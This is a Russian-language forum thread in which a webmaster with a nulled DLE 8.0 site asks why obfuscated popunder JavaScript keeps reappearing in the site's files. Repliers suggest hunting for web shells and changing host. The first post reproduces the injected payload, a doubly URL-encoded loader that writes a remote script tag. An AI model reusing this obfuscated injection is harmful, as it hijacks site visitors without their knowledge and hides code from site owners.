Злоумышленник загужает js код партнерской программы

Тема в разделе "Мегафлуд", создана пользователем Smoke, 13 июл 2009.

Статус темы:
Закрыта.
  1. Smoke

    Smoke Создатель

    Регистр.:
    12 апр 2007
    Сообщения:
    18
    Симпатии:
    1
    Здравствуйте. Столкнулся скорее всего с проблемой взлома dle. По разделу побродил, поиск покрутил, решения проблемы не нашел :(
    1) Версия DLE 8.0
    2) Nulled by M.I.D-Team
    Злоумышленник добавляет на мой сайт ява скрипт код какой то поп ап партнерской программы. При тыке по любой части сайта всплывает рекламное окно.
    Сначало код добавлялся в файлы шаблона mail.tpl и fullstory.tpl
    Почистил, снял права на изменение файлов. Через какое то время код снова появился. Найти не смог. В настройка DLE отключил загрузку файлов и код сам пропал. Через какое то время код снова появился. Сейчас уже повидимому в файлах самого движка. Бекапил БД, сносил полностью DLE, ставил с нуля, восстановил из бекапа. На следующий день код опять появился. Хотел спросить каким способом загружается код. Может быть есть какие то дыры в DLE и как закрыть если есть. Желающим глянуть и помочь могу скинуть урл сайта в личку.
    В html коде главной страницы сайта код выглядит так:
    Код:
    <html><head><script> 
    enc = "%3Cscript%20language%3D%22javascript%22%3E%0D%0Avar%20x%3D%222%22%3Bdocument.write%28unescape%28%27%253C%2573%2563%2572%2569%2570%2574%2520%256C%2561%256E%2567%2575%2561%2567%2565%253D%2522%254A%2561%2576%2561%2553%2563%2572%2569%2570%2574%2522%2520%2573%2572%2563%253D%2522%2568%2574%2574%2570%253A%252F%252F%2531%2574%2572%2561%2566%2566%252E%2572%2575%252F%2573%2563%2572%2569%2570%2574%252F%256A%2573%252E%2570%2568%2570%253F%2569%2564%253D%2534%2536%2531%2534%2531%2526%256D%256F%2564%2565%253D%2563%256C%2569%2563%256B%2575%256E%2564%2565%2572%2522%253E%253C%252F%2573%2563%2572%2569%2570%2574%253E%27%29%29%3B%3C/script%3E"; 
    dec = unescape(enc); 
    document.write(dec); 
    </script><script language="javascript">
    var x="2";document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%31%74%72%61%66%66%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%70%68%70%3F%69%64%3D%34%36%31%34%31%26%6D%6F%64%65%3D%63%6C%69%63%6B%75%6E%64%65%72%22%3E%3C%2F%73%63%72%69%70%74%3E'));</script><script language="JavaScript" src="C%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C%20mp3%20%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D0%BE,%20%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D0%B0%20mp3%20%D0%BF%D0%B5%D1%81%D0%BD%D0%B8,%20%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%8B%D0%B5%20mp3%20%D0%BC%D0%B5%D0%BB%D0%BE%D0%B4%D0%B8%D0%B8,%20%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C%20%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83%20mp3_files/js.htm"></script>
    Заранее спасибо.
    p.s. пароли на ftp менял как только мог. Пробовал менять и не вводить их никуда, тем самым исключаю заражение червями моего компа. Пароли DLE тоже менял, файл admin.php переименован.
     
  2. Jerry

    Jerry тот самый Учиха

    Регистр.:
    16 апр 2006
    Сообщения:
    1.226
    Симпатии:
    490
    Поменяй хостера, если всё перепробывал. Ещё надо проверится встроенным антивирусом в DLE, на новые файлы.
     
  3. Smoke

    Smoke Создатель

    Регистр.:
    12 апр 2007
    Сообщения:
    18
    Симпатии:
    1
    Встроенный антивирус выглядет вот так 0.о

    [​IMG]

    замазанный файл - админ.php
     
  4. Rommel

    Rommel Читатель

    Заблокирован
    Регистр.:
    14 фев 2009
    Сообщения:
    19
    Симпатии:
    9
    Поменяй пароль на хосте, просмотри все файлы на шелы.
     
  5. krast90

    krast90 Писатель

    Регистр.:
    4 апр 2008
    Сообщения:
    7
    Симпатии:
    3
    Какие модули стоят на сайте? Вип-аккаунты случайно не стоят?
     
  6. Smoke

    Smoke Создатель

    Регистр.:
    12 апр 2007
    Сообщения:
    18
    Симпатии:
    1
    Нет никаких модулей.. Просто стандартно дисрибутив нуленный...

    завставил порыться чувака, намного больше знающего про dle чем йа... грит незнаю, полазий по dle шным сайтам.. мб че подскажут...
    просто перестановить то двиг йа смогу и восстановить из бекапа.. но на след день опять код засунут... нужно понять где косяк...
     
  7. t0os

    t0os

    Регистр.:
    21 окт 2007
    Сообщения:
    284
    Симпатии:
    36
    Или шелл, или через соседей. Если через соседей, то вычислить сложней. Так что ищите шелл.
     
  8. Akcium

    Akcium

    Регистр.:
    11 июн 2007
    Сообщения:
    449
    Симпатии:
    230
    Вот я не понимаю , раз ставят код партнерки значит сайт довольно посещаемый, если посещаемый значит приносит неплохой доход, если есть деньги от дохода почему не уйти к нормальному хостеру ? Почему я думаю что виноват хостер ? А вы попробуйте залить шелл на 8.0 без модулей . В общем проверяйте код (хтакцесс тоже смотрите) и меняйте хостера.
     
  9. Dark Angell

    Dark Angell Читатель

    Заблокирован
    Регистр.:
    29 фев 2008
    Сообщения:
    1.035
    Симпатии:
    690
    ничнём с того кто хостер,раз уж на то пошло,а партнёрка это скорей всего попандер
     
  10. benya

    benya

    Регистр.:
    17 июл 2008
    Сообщения:
    155
    Симпатии:
    38
    а у тебя нулл от mid team или тот который был раньше занулен другим чуваком? на dle.in.ua например писали что тот нулл был со сплоитами и шеллами.
     
Статус темы:
Закрыта.